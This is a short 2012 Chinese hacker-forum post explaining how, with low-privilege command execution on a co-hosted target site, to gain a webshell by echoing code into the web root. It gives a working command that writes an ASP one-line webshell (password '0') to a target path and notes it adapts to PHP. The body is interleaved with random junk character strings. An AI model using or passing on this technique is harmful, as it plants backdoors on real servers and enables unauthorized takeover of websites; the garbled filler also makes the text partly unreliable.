找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1979|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
9 B5 S" B/ z1 Q. m5 H, x' q
) n; R3 G* g  [% f命令格式1 k; W6 h' h0 f" |

& o/ s* i0 b0 r+ n4 l( wEcho 语句 >目标站绝对目录
9 f* a% p3 S$ T
; E& ~! Y7 E, R例如:
! O) r6 }  ?! `; W! D2 [  [- N# k. y+ f6 N0 u% c
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp$ `) Z% q+ q. N5 D
4 X0 p- M5 e) ~( V
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。7 D- k; ]0 p/ m6 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表